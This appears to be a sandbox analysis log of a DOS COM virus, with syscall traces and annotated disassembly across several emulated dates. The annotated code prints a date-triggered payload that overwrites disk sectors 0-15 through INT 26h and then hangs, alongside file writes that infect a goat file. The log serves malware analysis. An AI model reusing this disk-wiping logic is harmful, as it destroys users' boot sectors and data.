2018-12-25T12:01:49.744134313Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.7449006Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-25T12:01:49.746713415Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
2018-12-25T12:01:49.749540054Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
2018-12-25T12:01:49.751856067Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1  ; DH = month from INT 21h/AH=2Ah: January?
0x12ffd: jne 0x13025       ; no -> next date check at 0x13025
0x12fff: cmp dl, 1         ; DL = day: the 1st?
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0     ; CX = year: 2000?
0x13008: jne 0x13025
; This run takes the trigger path below: the next log rows are Get default drive (PC 1300e)
; and Display string (PC 13020), consistent with the 2000-01-01 date in the JSON line printed before this run.
0x1300a: mov ah, 0x19      ; get default drive (returned in AL)
0x1300c: int 0x21
0x1300e: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x13011: mov cx, 0x10      ; CX = sector count (16)
0x13014: mov bx, 0         ; DS:BX = source buffer
0x13017: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
; NOTE(review): the syscall table has no row for this INT 26h; presumably only INT 21h calls are logged,
; so a missing row is not evidence that the disk write was skipped -- confirm against the tracer.
0x13019: mov ah, 9         ; print the '$'-terminated string at DS:010Eh
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020       ; jump-to-self: execution hangs here (the log for this run ends at PC 13020)
0x13022: jmp 0x133c5       ; not reachable by fall-through
0x13025: mov ah, 0x2a      ; read the date again
0x13027: int 0x21
0x13029: cmp dh, 0xb       ; November? (excerpt ends mid-check)
2018-12-25T12:01:49.754449227Z 25 PC: 1300e | Get default drive
2018-12-25T12:01:51.815442129Z 9 PC: 13020 | Display string (String= 'e (COM). Size=0000014Dh/0000000333d bytes. ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.892692794Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.896886657Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.89937465Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.900144589Z 75 PC: 12fad | Execute program
2018-12-25T12:01:49.901995221Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc  ; INT 21h/AH=2Ah returned CX = year, DH = month, DL = day. December?
0x12fc4: jne 0x12fe6       ; no -> next date check at 0x12fe6
0x12fc6: cmp dl, 0x18      ; the 24th?
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19      ; date-trigger path: get default drive (returned in AL)
0x12fcd: int 0x21
0x12fcf: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x12fd2: mov cx, 0x10      ; CX = sector count (16)
0x12fd5: mov bx, 0         ; DS:BX = source buffer
0x12fd8: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x12fda: mov ah, 9         ; print the '$'-terminated string at DS:000Eh
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1       ; jump-to-self: execution hangs here
0x12fe3: jmp 0x133c5       ; not reachable by fall-through
0x12fe6: mov ah, 0x2a      ; read the date again
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc       ; December?
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19      ; the 25th? (excerpt ends mid-check)
2018-12-25T12:01:49.904120973Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc  ; DH = month from INT 21h/AH=2Ah: December?
0x12fed: jne 0x12ff6       ; no -> next date check at 0x12ff6
0x12fef: cmp dl, 0x19      ; DL = day: the 25th?
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb       ; 25 December -> disk-write trigger path at 0x12fcb
0x12ff6: mov ah, 0x2a      ; read the date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1         ; January?
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1         ; the 1st?
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0     ; CX = year: 2000?
0x13008: jne 0x13025
0x1300a: mov ah, 0x19      ; 1 January 2000 trigger path: get default drive (returned in AL)
0x1300c: int 0x21
0x1300e: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x13011: mov cx, 0x10      ; CX = sector count (16)
0x13014: mov bx, 0         ; DS:BX = source buffer
0x13017: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x13019: mov ah, 9         ; excerpt ends here
2018-12-25T12:01:49.906429294Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1  ; DH = month from INT 21h/AH=2Ah: January?
0x12ffd: jne 0x13025       ; no -> next date check at 0x13025
0x12fff: cmp dl, 1         ; DL = day: the 1st?
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0     ; CX = year: 2000? (not matched in this run: the next log row is the Get date at PC 13029)
0x13008: jne 0x13025
0x1300a: mov ah, 0x19      ; 1 January 2000 trigger path: get default drive (returned in AL)
0x1300c: int 0x21
0x1300e: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x13011: mov cx, 0x10      ; CX = sector count (16)
0x13014: mov bx, 0         ; DS:BX = source buffer
0x13017: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x13019: mov ah, 9         ; print the '$'-terminated string at DS:010Eh
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020       ; jump-to-self: execution hangs here
0x13022: jmp 0x133c5       ; not reachable by fall-through
0x13025: mov ah, 0x2a      ; read the date again
0x13027: int 0x21
0x13029: cmp dh, 0xb       ; November? (excerpt ends mid-check)
2018-12-25T12:01:49.909275613Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb  ; DH = month from INT 21h/AH=2Ah: November?
0x1302c: jne 0x1304e       ; no -> skip the trigger, continue at 0x1304e
0x1302e: cmp dl, 6         ; DL = day: the 6th?
0x13031: jne 0x1304e
0x13033: mov ah, 0x19      ; 6 November trigger path: get default drive (returned in AL)
0x13035: int 0x21
0x13037: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x1303a: mov cx, 0x10      ; CX = sector count (16)
0x1303d: mov bx, 0         ; DS:BX = source buffer
0x13040: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x13042: mov ah, 9         ; print the '$'-terminated string at DS:01A7h
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049       ; jump-to-self: execution hangs here
0x1304b: jmp 0x133c5       ; not reachable by fall-through
0x1304e: mov ax, 0xffff    ; no date matched (the path this run takes: the log continues with memory and file calls)
0x13051: mov ds, ax        ; DS = FFFFh
0x13053: push cs           ; ES = CS
0x13054: pop es
0x13055: xor si, si        ; SI = 0; how DS:SI is used lies outside this excerpt
2018-12-25T12:01:49.911781064Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.913764893Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.915828172Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.92081302Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.926148886Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.932154595Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.935348482Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.93956837Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.941409407Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.94558922Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.459074382Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:50.460902261Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.465034246Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:50.467365005Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:50.475141665Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:50.49599653Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:50.191720879Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:50.194247684Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:50.197803857Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:50.198793899Z 75 PC: 12fad | Execute program
2018-12-25T12:01:50.200241787Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc  ; INT 21h/AH=2Ah returned CX = year, DH = month, DL = day. December?
0x12fc4: jne 0x12fe6       ; no -> next date check at 0x12fe6
0x12fc6: cmp dl, 0x18      ; the 24th?
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19      ; date-trigger path: get default drive (returned in AL)
0x12fcd: int 0x21
0x12fcf: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x12fd2: mov cx, 0x10      ; CX = sector count (16)
0x12fd5: mov bx, 0         ; DS:BX = source buffer
0x12fd8: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x12fda: mov ah, 9         ; print the '$'-terminated string at DS:000Eh
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1       ; jump-to-self: execution hangs here
0x12fe3: jmp 0x133c5       ; not reachable by fall-through
0x12fe6: mov ah, 0x2a      ; read the date again
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc       ; December?
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19      ; the 25th? (excerpt ends mid-check)
2018-12-25T12:01:50.202490702Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc  ; DH = month from INT 21h/AH=2Ah: December?
0x12fed: jne 0x12ff6       ; no -> next date check at 0x12ff6
0x12fef: cmp dl, 0x19      ; DL = day: the 25th?
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb       ; 25 December -> disk-write trigger path at 0x12fcb
0x12ff6: mov ah, 0x2a      ; read the date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1         ; January?
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1         ; the 1st?
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0     ; CX = year: 2000?
0x13008: jne 0x13025
0x1300a: mov ah, 0x19      ; 1 January 2000 trigger path: get default drive (returned in AL)
0x1300c: int 0x21
0x1300e: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x13011: mov cx, 0x10      ; CX = sector count (16)
0x13014: mov bx, 0         ; DS:BX = source buffer
0x13017: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x13019: mov ah, 9         ; excerpt ends here
2018-12-25T12:01:50.204897362Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1  ; DH = month from INT 21h/AH=2Ah: January?
0x12ffd: jne 0x13025       ; no -> next date check at 0x13025 (taken in this run: the next log row is the Get date at PC 13029)
0x12fff: cmp dl, 1         ; DL = day: the 1st?
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0     ; CX = year: 2000?
0x13008: jne 0x13025
0x1300a: mov ah, 0x19      ; 1 January 2000 trigger path: get default drive (returned in AL)
0x1300c: int 0x21
0x1300e: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x13011: mov cx, 0x10      ; CX = sector count (16)
0x13014: mov bx, 0         ; DS:BX = source buffer
0x13017: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x13019: mov ah, 9         ; print the '$'-terminated string at DS:010Eh
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020       ; jump-to-self: execution hangs here
0x13022: jmp 0x133c5       ; not reachable by fall-through
0x13025: mov ah, 0x2a      ; read the date again
0x13027: int 0x21
0x13029: cmp dh, 0xb       ; November? (excerpt ends mid-check)
2018-12-25T12:01:50.207109632Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb  ; DH = month from INT 21h/AH=2Ah: November?
0x1302c: jne 0x1304e       ; no -> skip the trigger, continue at 0x1304e
0x1302e: cmp dl, 6         ; DL = day: the 6th? (not matched in this run: the log continues with memory and file calls)
0x13031: jne 0x1304e
0x13033: mov ah, 0x19      ; 6 November trigger path: get default drive (returned in AL)
0x13035: int 0x21
0x13037: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x1303a: mov cx, 0x10      ; CX = sector count (16)
0x1303d: mov bx, 0         ; DS:BX = source buffer
0x13040: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x13042: mov ah, 9         ; print the '$'-terminated string at DS:01A7h
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049       ; jump-to-self: execution hangs here
0x1304b: jmp 0x133c5       ; not reachable by fall-through
0x1304e: mov ax, 0xffff    ; no date matched: DS = FFFFh
0x13051: mov ds, ax
0x13053: push cs           ; ES = CS
0x13054: pop es
0x13055: xor si, si        ; SI = 0; how DS:SI is used lies outside this excerpt
2018-12-25T12:01:50.210260504Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:50.212456474Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:50.213986834Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:50.217051016Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:50.223195661Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:50.230094859Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:50.232998382Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:50.236081362Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:50.237662769Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.241553086Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.815461967Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.817104166Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.820496556Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.824093202Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.950392933Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.956788264Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":6,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:50.19979547Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:50.202539344Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:50.205143674Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:50.206051954Z 75 PC: 12fad | Execute program
2018-12-25T12:01:50.214378732Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc  ; INT 21h/AH=2Ah returned CX = year, DH = month, DL = day. December?
0x12fc4: jne 0x12fe6       ; no -> next date check at 0x12fe6
0x12fc6: cmp dl, 0x18      ; the 24th?
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19      ; date-trigger path: get default drive (returned in AL)
0x12fcd: int 0x21
0x12fcf: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x12fd2: mov cx, 0x10      ; CX = sector count (16)
0x12fd5: mov bx, 0         ; DS:BX = source buffer
0x12fd8: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x12fda: mov ah, 9         ; print the '$'-terminated string at DS:000Eh
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1       ; jump-to-self: execution hangs here
0x12fe3: jmp 0x133c5       ; not reachable by fall-through
0x12fe6: mov ah, 0x2a      ; read the date again
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc       ; December?
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19      ; the 25th? (excerpt ends mid-check)
2018-12-25T12:01:50.217371323Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc  ; DH = month from INT 21h/AH=2Ah: December?
0x12fed: jne 0x12ff6       ; no -> next date check at 0x12ff6
0x12fef: cmp dl, 0x19      ; DL = day: the 25th?
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb       ; 25 December -> disk-write trigger path at 0x12fcb
0x12ff6: mov ah, 0x2a      ; read the date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1         ; January?
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1         ; the 1st?
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0     ; CX = year: 2000?
0x13008: jne 0x13025
0x1300a: mov ah, 0x19      ; 1 January 2000 trigger path: get default drive (returned in AL)
0x1300c: int 0x21
0x1300e: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x13011: mov cx, 0x10      ; CX = sector count (16)
0x13014: mov bx, 0         ; DS:BX = source buffer
0x13017: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x13019: mov ah, 9         ; excerpt ends here
2018-12-25T12:01:50.220361006Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1  ; DH = month from INT 21h/AH=2Ah: January?
0x12ffd: jne 0x13025       ; no -> next date check at 0x13025 (taken in this run: the next log row is the Get date at PC 13029)
0x12fff: cmp dl, 1         ; DL = day: the 1st?
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0     ; CX = year: 2000?
0x13008: jne 0x13025
0x1300a: mov ah, 0x19      ; 1 January 2000 trigger path: get default drive (returned in AL)
0x1300c: int 0x21
0x1300e: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x13011: mov cx, 0x10      ; CX = sector count (16)
0x13014: mov bx, 0         ; DS:BX = source buffer
0x13017: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
0x13019: mov ah, 9         ; print the '$'-terminated string at DS:010Eh
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020       ; jump-to-self: execution hangs here
0x13022: jmp 0x133c5       ; not reachable by fall-through
0x13025: mov ah, 0x2a      ; read the date again
0x13027: int 0x21
0x13029: cmp dh, 0xb       ; November? (excerpt ends mid-check)
2018-12-25T12:01:50.223246134Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb  ; DH = month from INT 21h/AH=2Ah: November?
0x1302c: jne 0x1304e       ; no -> skip the trigger, continue at 0x1304e
0x1302e: cmp dl, 6         ; DL = day: the 6th?
0x13031: jne 0x1304e
; This run takes the trigger path below: the next log rows are Get default drive (PC 13037)
; and Display string (PC 13049), consistent with the 1980-11-06 date in the JSON line printed before this run.
0x13033: mov ah, 0x19      ; get default drive (returned in AL)
0x13035: int 0x21
0x13037: mov dx, 0         ; INT 26h: DX = first logical sector (0)
0x1303a: mov cx, 0x10      ; CX = sector count (16)
0x1303d: mov bx, 0         ; DS:BX = source buffer
0x13040: int 0x26          ; DOS absolute disk write to the drive in AL: overwrites logical sectors 0-15 (boot sector onward)
; NOTE(review): the syscall table has no row for this INT 26h; presumably only INT 21h calls are logged,
; so a missing row is not evidence that the disk write was skipped -- confirm against the tracer.
0x13042: mov ah, 9         ; print the '$'-terminated string at DS:01A7h
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049       ; jump-to-self: execution hangs here (the log for this run ends at PC 13049)
0x1304b: jmp 0x133c5       ; not reachable by fall-through
0x1304e: mov ax, 0xffff    ; path for non-matching dates: DS = FFFFh
0x13051: mov ds, ax
0x13053: push cs           ; ES = CS
0x13054: pop es
0x13055: xor si, si        ; SI = 0; how DS:SI is used lies outside this excerpt
2018-12-25T12:01:50.226137824Z 25 PC: 13037 | Get default drive
2018-12-25T12:01:50.459084826Z 9 PC: 13049 | Display string (String= ' ')